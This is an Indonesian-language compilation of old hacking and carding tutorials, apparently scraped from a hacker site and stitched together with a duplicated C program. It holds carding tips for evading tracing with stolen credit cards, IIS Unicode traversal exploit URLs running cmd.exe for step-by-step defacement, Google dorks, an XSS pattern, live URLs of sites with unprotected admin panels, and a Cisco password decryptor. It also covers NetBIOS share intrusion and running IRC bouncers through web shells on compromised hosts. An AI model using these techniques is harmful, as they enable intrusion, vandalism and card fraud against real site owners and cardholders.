kriminil jenis baru ini (yang, umumnya adalah cowok ABG) adalah, apalagi
kalau bukan, registrasi 'member' untuk klub-klub porno di Internet.

Beberapa anggapan
=================

1. Tidak mungkin saya bisa dilacak, toh, ini Internet, dan tak ada yang
melihat.
Hampir benar. Mungkin jika kamu hanya menggunakannya untuk pemalsuan
kelas teri, akan dibiarkan saja berlalu. Dalam pemalsuan kelas kakap, pun,
kamu masih bisa lolos tanpa dilacak. Tapi dengan syarat kamu benar-benar
hati-hati. Gunakan line telepon yang bukan milikmu, gunakan account
internet bukan milikmu, dari web gunakan Anonymizer, dll dll (seperti
layaknya cracking/intruding). Namun resiko kamu terlacak jelas ada, bahkan
di Indonesia sekalipun. Setiap transaksi di Internet merekam nomor IP
kamu, walaupun browser kamu tidak diset 'secure'. Anonymizer tidak
bersedia melayani protokol https:// (secure HTTP). Dial-in server yang
kamu gunakan punya catatan nomor mana yang memanggil. Dan, kalo
dipikir-pikir, jika kamu benar-benar konak, kenapa susah-susah, sih? Toh
gambar-gambar kayak gituan banyak tersedia eceran kaki lima. Menggunakan
kartu kredit milik orang ada gunanya jika misalnya kamu berhasil
mendapatkan kartu kredit milik Bambang Suharto atau sodara-sodaranya. Nah,
itu baru enak, bisa kamu porotin tuh orang-orang yang selama ini morotin
rakyat.

2. Kita bisa menggunakan kartu kredit hasil dari 'CC Generator'.
Biasanya tidak benar. Memang, banyak program-program yang beredar di
internet dan bisa menghasilkan nomor kartu kredit, namun program-program
tsb biasanya bekerja atas dasar logaritma nomor kartu kredit. Dan 'nomor
kartu kredit' hasil buatan program-program tsb adalah fiktif. Sedikit
servis di Internet yang melakukan check hanya berdasarkan algoritma ini
saja. Pada umumnya servis-servis komersial menggunakan check berdasar:
Nama Pemegang Kartu, Nomor Kartu, dan Kode Pos alamat pemegang kartu.

3. Saya sudah berhasil mendapatkan password/login untuk barely.hustler.com
(atau sejenisnya) tentunya mulai dari sekarang, saya selalu bisa
mengakses site tsb sebagai 'member'.
Tidak benar. Biasanya nomor kartu kredit hasil curian mempunyai 'umur
hidup' tertentu. Umur hidup ini bervariasi. Kadang-kadang setelah kamu
meregistrasi/mengorder barang pada malam hari, keesokan harinya sang
perusahaan korban melakukan check, dan menemukan kejanggalan (contoh:
Alamat tidak sinkron). Atau bisa juga minggu depannya. Kemungkinan lain
adalah sang pemilik kartu kredit yang asli akan menemukan kejanggalan di
'bill' (laporan rekening) kartu kreditnya. Hal ini akan membuatnya waspada
dan melaporkan kepada bank/institusi finansialnya. Segera setelah itu,
account ilegal kamu akan dimatikan (dan, jika serius masalahnya, bisa
dilakukan pelacakan). Cara yang bisa digunakan untuk memperpanjang 'umur
hidup' nomor curianmu antara lain adalah dengan cara menggunakan kartu
kredit korporasi (milik perusahaan besar), membatasi transaksi ilegal yang
dilakukan (jangan diumbar sekali pakai habisin $200), dlsb.

4. Jangan sekali-kali menggunakan kartu kredit untuk telepon SLJJ/Long
Distance.
Cukup benar. Di Amerika, perusahaan-perusahaan seperti Sprint, AT&T, dll
menerima kartu kredit sebagai ganti koin untuk layanan telepon jarak jauh,
atau bahkan kadang-kadang internasional. Walaupun kamu menggunakan telepon
umum, resiko masih ada. Mereka bisa melacak siapa yang kamu telepon. Hal
ini tentunya bukan masalah jika kamu menelepon teman kamu yang *juga*
menggunakan telepon umum, atau teman kamu yang tinggal di, ... Libya,
misalnya.

Penutup
=======

Kayaknya cukup segini dulu, deh, sebab udah mulai kepanjangan nih. Saran
saya kepada kalian yang tertarik untuk menjadi 'professional carder',
hati-hatilah selalu. Eksplorasi adalah hal yang baik, tapi pastikan
sedapat mungkin kamu tidak merugikan orang lain atau dirimu sendiri. Gitu
dulu, deh. Ciao ..

Comersus Shoping Cart

Dengan google, cari kata kuncinya :
allinurl:comersus_message.asp
allinurl:comersus_backoffice_message.asp

setelah itu kita beri tambahan dengan croos scripting, misalnya :

http://www.target.net/comersus/store/comersus_message.asp?message=

PeNcOpEt_CiNtA



atau kita bisa mengirim email untuk admin hehehehe ini contoh lagi :

http://www.target.net/comersus/backofficelite/comersus_backoffice_message.asp?message=

BackOffice%20Lite


User

Password
sekian dulu aja yachhh, entar nyambung lagi

Deface NT Web

Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya dilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo loe adalah web master dan loe ngerubah tampilan halaman situs yang loe punya tentu saja
itu nggak bisa disebut deface...heheheh. Banyak yang bertanya "gimana sich nge-deface situs?" seperti yang telah gue sebutin diatas proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kamu ketah
ui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbedaapabila kita ingin melakukan deface diantara kedua OS tsb. Operating
System atau OS biasanya kalo gue sich gue kelompikin ke 2 keluarga besar,yaitu :
1. IIS (server untuk microsoft, dkk)
2. Unix(linux,BSD,IRIX,SOLARIS,dsb)

Nah kita kelompikin jadi 2 gitu aja yah..:) sekarang saya coba jelaskan satu-satu. Dikarenakan sudah banyak tutorial yang membahas mengenai kelemahan dari IIS (baik IIS 4 maupun 5) maka disini gue cumancopy-paste tutorial yang pernah dibuat oleh salah satu "maha guru" dalam
komunitas #cracxer di DALNET, yah sapa lagi kalo bukan "pak-tani" (master..paLa loE lONjoNG..!!) heheheeh... ini dia tutorialnya :

~*~DEFACING NT WEB SERVER WITH BUG UNICODE MICROSOFT IIS~*~
-------------------------------------------------------------

Melalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang
menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui...Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan "unicode bug". Sayah tidak akan menjelaskan panjang lebar mengenai "unicode bug" ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! jgn bilang sapa2 yah sebenernyah sayah teh emang gak tau ...ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser.

OK...mari kita mulai...Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)...key nya terserah kowe.....Lalu utk mengetahui site itu menggunakan
MS IIS 4.0/5.0...Kita scan terlebih dahulu di www.netcraft.com......dapat site yah..??...Okeh..
setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ...Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc....coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg bisa and DL di http://accessftp.topcities.com/.... or memakai cara manual yg lebih sering sayah gunakan ehehhehehhee...contoh:

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

Ada dua kemungkinan yang tampil pada browser Anda yaitu:
Kahiji : Muncul pesan ERROR ...
Kaduana : Muncul daftar file-file dari drive C pada komputer server target. Bila ini terjadi maka
www.targethost.com tadi ada kemungkinan untuk bisa kita deface...

Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL diatas menjadi empat bagian yaitu :
• Bagian host, yaitu "http://www.targethost.com"
• Bagian exploit string, yaitu "/scripts/..%255c..%255c"
• Bagian folder, yaitu "/winnt/system32/"
• Bagian command, yaitu "cmd.exe?/c+dir+c:\"

Kita lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang berarti melihat seluruh
file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti "dir d:\"
atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda "+". Koe bahkan bisa menge
tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah "ipconfig.exe /all"

Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada
browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering
tembus adalah :
- /cgi-bin/..%255c..%255c
- /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..
- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /scripts/..%255c..%255c

Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka
kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss ...hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran....(yg sabar yah nak nyari targetnyah...ehehhehehe).

Lanjuttt......udeh dapet site yg bug unicodenyah gak di patch..??....Langkah berikutnya adalah
mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,
index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml.
Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau
D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set

URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??...
Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah...gak ada yahh ..??...coba deh koe ripresh lagehh...udah ketemuuu...nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah.....Kita ambil contoh PATH_TRANSLATEDnyah : C:\InetPub\wwwroot....Perintahnya ng-DIR nyah :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot

Huaaaaaaa....isinyah banyak banged yahh.....mana dokumen2 web yg kita curigain itu ada 3 bijih
lagehh....hemm santeyy...oiyahh...lupa sayah...Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah.....
truss kita cari dokumen web itu disitu utk kita RENAME....gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy...coba skrg koe buka site aslinyah di laen window....
http://www.targethost.com == neh yg ini......di situ kan alias di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME....misalnya : di

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot itu ada :
Directory of C:\InetPub\wwwroot
07/20/01 03:21p 1,590 default.htm
07/20/01 03:21p 590 index.html
07/20/01 03:21p 3,453 main.html

Udah di buka kan site aslinyah...nah coba masukin salah satu dokumen web itu di site asli nyah...
contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html

Lihat apa yg terjadi di IE kitaa

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access is denied

Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat
targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :

Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site
tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee
(Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk
langkah selanjutnyah*)


Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..
Kedua lewat TFTP32.


*Cara pertama :*
Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori
C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe
. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL
berikut :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\cmdku.exe

Lumpuhkan Deepfreeze

Untuk Uninstall program ini atau melakukan perubahan
yang permanen pada windows, misalnya install program
baru, dibutuhkan password yang di set pada saat
install DeepFreeze.

Tanpa password ini jangan harap anda dapat merubah
setting komputer anda, jadi bisa dibayangkan jikalau
anda lupa password tersebut (mungkin yang anda lakukan
adalah memformat hardisk tersebut).

Namun jika anda mengalaminya jangan khawatir, ikuti
langkah-langkah berikut, mudah-mudahan masalah anda
dapat terselesaikan.

1. Download "XDeepFreeze" di
http://geocities.com/macancrew/xdeepfreeze.zip

2. Ekstrak ke C:\XDeepfreeze

3. Jalankan "Run_Me.exe" yang akan menghasilkan file
"mcr.bat" dan "XDeepFreeze.exe" akan terload.

4. Pada XDeepFreeze, Tekan "Stop DeepFreeze", untuk
menghentikan "frzstate.exe"

5. Pada XDeepFreeze, Tekan "Clean Registry", untuk
membersihkan registry yang dibuat deepfreeze pada saat
install.

6. Untuk masuk ke MS-Dos Mode, Jalankan "command.com"
(Sudah disertakan pada "xdeepfreeze.zip")

7. Jalankan "mcr.bat" (Berisi perintah yang akan
menghapus file "persifrz.vxd")

8. Ketik "Exit" untuk masuk ke Windows kembali.
Dan.....DeepFreeze tidak berfungsi lagi.

Silahkan install ulang DeepFreeze, ingat dan catat
baik-baik password yang anda gunakan.
Jika anda lupa lagi lakukan kembali cara diatas

ASP

lebih lanjut...
ARF yang dikeluarkan oleh http://www.asp-dev.com/ bekerja pada platform Windows memiliki bug yang sangat fatal. Yaitu admin (sebenarnya admin atau pembuat template ya ?) tidak memberikan login username dan password pada bagian administrator web nya, sehingga siapa saja bisa masuk melalui http://www.target.com/forum/admin/default.asp

Sehingga semua orang bisa masuk dan melakukan editing / penghapusan / penambahan isi dari BBS -nya.

Jika anda menggunakan template tersebut dalam BBS anda, sebaiknya menambahkan login username dan password pada bagian /admin/default.asp sehingga BBS anda terhindar dari kejahilan orang lain.

Contoh yang bisa dicoba seperti berikut ini (saat penulisan ini belum dipatch) :
1. http://www.rvnair.com/bbs/admin/default.asp
2. http://www.equuspages.com/forum/forum2/admin/
3. http://www.joinweb.com/forum/admin/

Hack FTP

#include
#include

char xlat[] = {
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};

char pw_str1[] = "password 7 ";
char pw_str2[] = "enable-password 7 ";

char *pname;

cdecrypt(enc_pw, dec_pw)
char *enc_pw;
char *dec_pw;
{
unsigned int seed, i, val = 0;

if(strlen(enc_pw) & 1)
return(-1);

seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';

if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
return(-1);

for (i = 2 ; i <= strlen(enc_pw); i++) {
if(i !=2 && !(i & 1)) {
dec_pw[i / 2 - 2] = val ^ xlat[seed++];
val = 0;
}

val *= 16;

if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {
val += enc_pw[i] - '0';
continue;
}

if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
val += enc_pw[i] - 'A' + 10;
continue;
}

if(strlen(enc_pw) != i)
return(-1);
}

dec_pw[++i / 2] = 0;

return(0);
}

usage()
{
fprintf(stdout, "Usage: %s -p \n", pname);
fprintf(stdout, " %s \n", pname);

return(0);
}

main(argc,argv)
int argc;
char **argv;

{
FILE *in = stdin, *out = stdout;
char line[257];
char passwd[65];
unsigned int i, pw_pos;

pname = argv[0];

if(argc > 1)
{
if(argc > 3) {
usage();
exit(1);
}

if(argv[1][0] == '-')
{
switch(argv[1][1]) {
case 'h':
usage();
break;

case 'p':
if(cdecrypt(argv[2], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
fprintf(stdout, "password: %s\n",
passwd);
break;

default:
fprintf(stderr, "%s: unknow option.",
pname);
}

return(0);
}

if((in = fopen(argv[1], "rt")) == NULL)
exit(1);
if(argc > 2)
if((out = fopen(argv[2], "wt")) == NULL)
exit(1);
}

while(1) {
for(i = 0; i < 256; i++) {
if((line[i] = fgetc(in)) == EOF) {
if(i)
break;

fclose(in);
fclose(out);
return(0);
}
if(line[i] == '\r')
i--;

if(line[i] == '\n')
break;
}
pw_pos = 0;
line[i] = 0;

if(!strncmp(line, pw_str1, strlen(pw_str1)))
pw_pos = strlen(pw_str1);

if(!strncmp(line, pw_str2, strlen(pw_str2)))
pw_pos = strlen(pw_str2);

if(!pw_pos) {
fprintf(stdout, "%s\n", line);
continue;
}

if(cdecrypt(&line[pw_pos], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
else {
if(pw_pos == strlen(pw_str1))
fprintf(out, "%s", pw_str1);
else
fprintf(out, "%s", pw_str2);

fprintf(out, "%s\n", passwd);
}
}
}




Selamat mencoba moga2 berguna buat temen.

Hacking Cisco

#include
#include

char xlat[] = {
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};

char pw_str1[] = "password 7 ";
char pw_str2[] = "enable-password 7 ";

char *pname;

cdecrypt(enc_pw, dec_pw)
char *enc_pw;
char *dec_pw;
{
unsigned int seed, i, val = 0;

if(strlen(enc_pw) & 1)
return(-1);

seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';

if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
return(-1);

for (i = 2 ; i <= strlen(enc_pw); i++) {
if(i !=2 && !(i & 1)) {
dec_pw[i / 2 - 2] = val ^ xlat[seed++];
val = 0;
}

val *= 16;

if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {
val += enc_pw[i] - '0';
continue;
}

if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
val += enc_pw[i] - 'A' + 10;
continue;
}

if(strlen(enc_pw) != i)
return(-1);
}

dec_pw[++i / 2] = 0;

return(0);
}

usage()
{
fprintf(stdout, "Usage: %s -p \n", pname);
fprintf(stdout, " %s \n", pname);

return(0);
}

main(argc,argv)
int argc;
char **argv;

{
FILE *in = stdin, *out = stdout;
char line[257];
char passwd[65];
unsigned int i, pw_pos;

pname = argv[0];

if(argc > 1)
{
if(argc > 3) {
usage();
exit(1);
}

if(argv[1][0] == '-')
{
switch(argv[1][1]) {
case 'h':
usage();
break;

case 'p':
if(cdecrypt(argv[2], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
fprintf(stdout, "password: %s\n",
passwd);
break;

default:
fprintf(stderr, "%s: unknow option.",
pname);
}

return(0);
}

if((in = fopen(argv[1], "rt")) == NULL)
exit(1);
if(argc > 2)
if((out = fopen(argv[2], "wt")) == NULL)
exit(1);
}

while(1) {
for(i = 0; i < 256; i++) {
if((line[i] = fgetc(in)) == EOF) {
if(i)
break;

fclose(in);
fclose(out);
return(0);
}
if(line[i] == '\r')
i--;

if(line[i] == '\n')
break;
}
pw_pos = 0;
line[i] = 0;

if(!strncmp(line, pw_str1, strlen(pw_str1)))
pw_pos = strlen(pw_str1);

if(!strncmp(line, pw_str2, strlen(pw_str2)))
pw_pos = strlen(pw_str2);

if(!pw_pos) {
fprintf(stdout, "%s\n", line);
continue;
}

if(cdecrypt(&line[pw_pos], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
else {
if(pw_pos == strlen(pw_str1))
fprintf(out, "%s", pw_str1);
else
fprintf(out, "%s", pw_str2);

fprintf(out, "%s\n", passwd);
}
}
}




Selamat mencoba moga2 berguna buat temen.

Hack Windows 98

1. Ok, first check to see that you have all of the necessary files.
Here they are, these should be in the control panel (start, run, control panel, network).

1. NetBEUI
2. TCP/IP
3. IPX/SPX
4. Client for Microsoft Networks
5. File Sharing for Microsoft

Of course you will also have a dial up adapter or an ethernet adapter based on
your network topology.

Ok, now that you have all that installed, you can check out remote computers.
Windows 95 is very limited in the ways you can attack remote hosts. After many
long hours I figured out a way that always works. Ok, so first get an IP. These
are easy to get. You can go on IRC and just /whois people or you can use Legion, just
check a search engine to check a bunch of IP's with filesharing enabled.

Ok, so now that you have an IP, try this...

nbtstat -A 123.456.789.1 (Fill in actual IP)
Netbios Name
^
SHARE <00>
SHARE <20> That's what we want!
FILE <1b>

and so on..

If they have the 20 there that means that they might be vulnerable. So,
go to start, programs, accessories, notepad. Then, go to start, run,
c:\windows. Then click and drag the lmhosts (exactly lmhosts, not lmhosts.sam. Check
winfile for extension) into the notepad. Add the following. So, we have our IP and netbiosname

123.456.789.1 SHARE #PRE

Then, click on File, Save. Then from MS-DOS prompt type

nbtstat -R <-- to refresh netbios>

Then, go to start, find, computer and enter the netbiosname of the
computer of the IP you have. If it finds it, that means that it has
filesharing on it, if you get a password prompt, you can try but I wouldn't
suggest it. Many computers don't have password protection. So, this was really
brief but it works, and that's what matters.

Install 2 OS

1. saya asumsikan bahwa komputer anda sudah terinstalasi windows 98 (win 2000) dengan baik, apa bila belum maka bapak dapat menginstalnya terlebih dahulu.

2. bila windows 98 sudah terinstal, maka ada baiknya bapak sudah memback-up semua data bapak, kalau-kalau terjadi kesalahan dalam mempartisi, karena kita masih sam-sama belajar, jadi pada awalnya kita harus membuat pencegahan.
3. kemudian installah partition magic 7.0 (ada dalam : pc shop 2002, pc shop 121, pc shop 2003)pada komputer bapak. dari sinilah kita memulai partisi dari hardisk tersebut.
4.setelah partition magic tadi sudah terinstal (diasumsikan bahwa tidak ada masalah pada saat anda mengFDISK komputer bapak), dalam hardisk bapak terbagi dua c:/ dan d:/, maka kita buat new partition pada hardisk bapak tersebut, kemudian kita bisa memilihnya , ada linux dan lain-lain (baca semua instruksinya, dan ikuti semua keterangan yang "recomended").
setelah partisi untuk linux dan swap-nya sudah di buat, maka bapak dapat merestart komputer bapak, dan selanjutnya partition maic yan akan bekerja untuk membagi harddisk tersebut.
5. (diasumsikan bahwa hardisk tsb telah terpartisi), maka bapak dapat merestart kembali dan kemudian mengset bios agar dapat booting dari cd-rom. lalu bapak masukan linux redhat 7.3 dan mulailah untuk menginstalnya. bapak dapat menggunakan yang graphic mode agar lebih mudah dalam penginstalan.
6. setelah itu anda tinggal next, kemudian tibalah pada language bapak dapat memilih English next lagi, installation type bapak pilih workstation, kemudian disk partitioning setup, bapak pilih “have the installer automatically partition for you”.
7. tiba pada “Automatic Partitioning” bapak pilih keep all partition and use existing free space kemudian next, bila ada pilihan (pilih OK).
8. tiba pada disk setup : klik di table dibawah yang memunyai mount = / (garis miring) kemudian di next lalu (OK).
9. boot loade configuration : bapak dapat memilih GRUB, terserah apabila mau memilih lilo, tapi kemarin saya memakai grub dan tidak bermasalah. kemudian klik di boot image nya pilih boot label DOS. Lalu tinggal next, dan selanjutnya untuk instalasi yang lain mungkin bapak bisa lanjutkan sendiri. Karena semua yang berhubungan dengan setting dual OS sudah lewat.

Install psyBNC & Eggdrop di cpanel bug

kebiasaan hacker hacker kita mencari rooting adalah untuk membuat bot eggdrop atau membuat psybnc. Namun saya beranggapan bhw kebanyakan teman teman sekalian kebingungan cara sehingga banyaklah situs situs yang di deface.

apakah kita bisa install psybnc di cpanel bug ?

lebih lanjut...
1. saya anggap bhw anda sudah berhasil melakukan upload ke dalam situs yang anda ambil lewat cpanel bug. Bila anda belum paham, silahkan anda baca tutorial tentang mengexplorasi cpanel < 5.3 di tulisan sebelumnya.

2. Upload ke dalam situs tersebut file yang bisa sebagai mediator seperti layaknya shell. Beberapa file yang bisa dijadikan mediator antara lain cgitelnet.pl, myshell.php, phpshell.php.

3. Bekerjalah di mediator tersebut.

4. Saat bekerja dengan mediator tersebut perlu anda ingat bhw kita bekerja di port 80 dengan notabene bhw anda adalah nobody (id) sehingga kita tdk bisa melakukan apapun di dalamnya. Namun kita bisa bekerja di wilayah /tmp/. Pindahlah ke folder /tmp/ dan selanjutnya bekerjalah diruang lingkup tersebut.

5. Proses instalasi psyBNC tidak akan saya jelaskan disini, karena saya anggap bhw anda sudah mahir. namun yang jadi sering kendala adalah saat mengganti port psyBNC tersebut.

6. Untuk melakukan editing port yaitu dengan menggunakan command echo. pertama adalah lakukan cat psybnc.conf
PSYBNC.SYSTEM.PORT1=31337
PSYBNC.SYSTEM.HOST1=*
PSYBNC.HOSTALLOWS.ENTRY0=*;*

Tentunya anda perlu buat ganti port tersebut.
ketiklah sebagai berikut untuk mengganti portnya

echo PSYBNC.SYSTEM.PORT1=5000 > psybnc.conf ; echo "PSYBNC.SYSTEM.HOST1=*" >> psybnc.conf ; echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> psybnc.conf

sehingga kita mendapatkan port baru yaitu port 5000

7. selanjutnya tinggal running ./psybnc dan saya sarankan anda buat menggunakan program fake untuk menghindari adminnya.

Jebol Password WIN XP

Mohon Maaf jika tulisan saya belepotan. Oke kita lanjut saja......
Pernah seorang teman menanyakan kepada saya, seperti ini...
Saya ndak bisa masuk sebagai administrator dalam komputer saya karena saya lupa
ama passwordnya. Tolong kasi tau dong gemana cara menghacknya...Lalu saya teringat
akan ulah saya yang suka iseng ama yang namanya komputer, hal itu saya lakukan
pada sebuah warnet yang suka membatasi usernya biar tidak bisa menginstal program
aneh.

Hehehehehe... akhirnya saya terpikir untuk menerbitkan tulisan ini karena menurut
saya bisa nambah ilmu buat mereka yang baru mengenal komputer dan windows xp
tentunya.

Oke deh kita lihat langkah-langkahnya satu persatu
eng ing eng.....

Pertama : Hidupkan kompimu (bahasa gaulnya = komputer)
Kedua : Jika sudah, tekan F8. Maka kamu akan di bawa ke mode "safe
mode"
tunggu beberapa menit
Ketiga : Tekan Ctrl + alt + Del Maka akan muncul form Login dan Password
Keempat : Isi login dengan Administrator serta passwordnya terserah anda
pokoknya passwordnya mudah di ingat oleh anda sendiri
Kelima : Jika telah melakukan hal di atas, restart kembali komputer anda
Keenam : Pilihlah start in normaly windows kalo ngga salah heheheh
Ketujuh : Tekan kembali Ctrl + Alt + Del
Kedelapan : Ketikkan nama loginnya Administrator terus password yang baru anda
ubah tadi
Kesembilan : Lihat apa yang terjadi, anda telah menjadi administrator di Kompi anda
Kesepuluh : Selesai......terserah anda mau lakukan apasaja

Semua langkah di atas sudah penulis coba dan hasilnya super manjur dan tidak
tertandingi

Jenis Jenis Serangan

Dalam dunia hacking (tepatnya cracking ding!?) dikenal beberapa jenis serangan terhadap
server. Berikut ini jenis-jenis serangan dasar yang dapat dikelompokkan dalam minimal 6
kelas, yaitu:

Intrusion
---------
Pada jenis serangan ini seorang cracker (umumnya sudah level hacker) akan dapat
menggunakan sistem komputer server. Serangan ini lebih terfokus pada full access granted
dan tidak bertujuan merusak. Jenis serangan ini pula yg diterapkan oleh para hacker untuk
menguji keamanan sistem jaringan mereka. Dilakukan dalam beberapa tahap dan tidak dalam
skema kerja spesifik pada setiap serangannya (dijelaskan pada artikel lain).
Hacking is an Art!? =)

Denial of Services (DoS)
------------------------
Penyerangan pada jenis DoS mengakibatkan layanan server mengalami stuck karena kebanjiran
request oleh mesin penyerang. Pada contoh kasus Distributed Denial of Services (DDoS)
misalnya; dengan menggunakan mesin-mesin zombie, sang penyerang akan melakukan packeting
request pada server secara serentak asimetris dan simultan sehingga buffer server akan
kelabakan menjawabnya!? Stuck/hung akan menimpa server. Jadi bukan server lagi namanya!?
(servicenya mati masak dibilang server? hehehe....)

Joyrider
--------
Nah, ini namanya serangan iseng!? Karena kebanyakan baca novel-novel hacking dan gak bisa
belajar benar, isenglah jadinya nyoba-nyoba nyerang pake ilmu-ilmu instan super cepat
(istilahnya 'onani' dimesin orang). Atau dengan alasan pengen tau isinya mesin orang!? =).
Yang jelas serangan jenis ini rata-rata karena rasa ingin tau, tapi ada juga yang sampe
menyebabkan kerusakan atau kehilangan data.

Vandal
------
Jenis serangan spesialis pengrusak!? nothing else to explain mbah!? =)

Scorekeeper
-----------
Serangan yang bertujuan mencapai reputasi hasil cracking terbanyak. Biasanya hanya
berbentuk deface halaman web (index/nambah halaman) dengan memampangakan NickName dan
kelompok tertentu. Sebagian besar masih tidak perduli dengan isi mesin sasarannya =).
Saat ini jenis penyerang ini lebih dikenal dengan sebutan WannaBe/Script kiddies.

Spy
---
Tiga hurup saja. Jenis serangan untuk memperoleh data atau informasi rahasia dari mesin
target. Biasanya menyerang pada mesin-mesin dengan aplikasi database didalamnya. Kadang
kala suatu perusahaan menyewa 'mata-mata' untuk mencuri data perusahaan rivalnya!? Mau
coba Pak? =)

KUDETA

Ini sebenarnya bukanlah bug dari phpclassifieds tapi merupakan kesalahan sang admin yg tidak menghapus file install.php pada phpclassifieds, sehingga kita dapat mengambil alih password adminnya.

lebih lanjut...
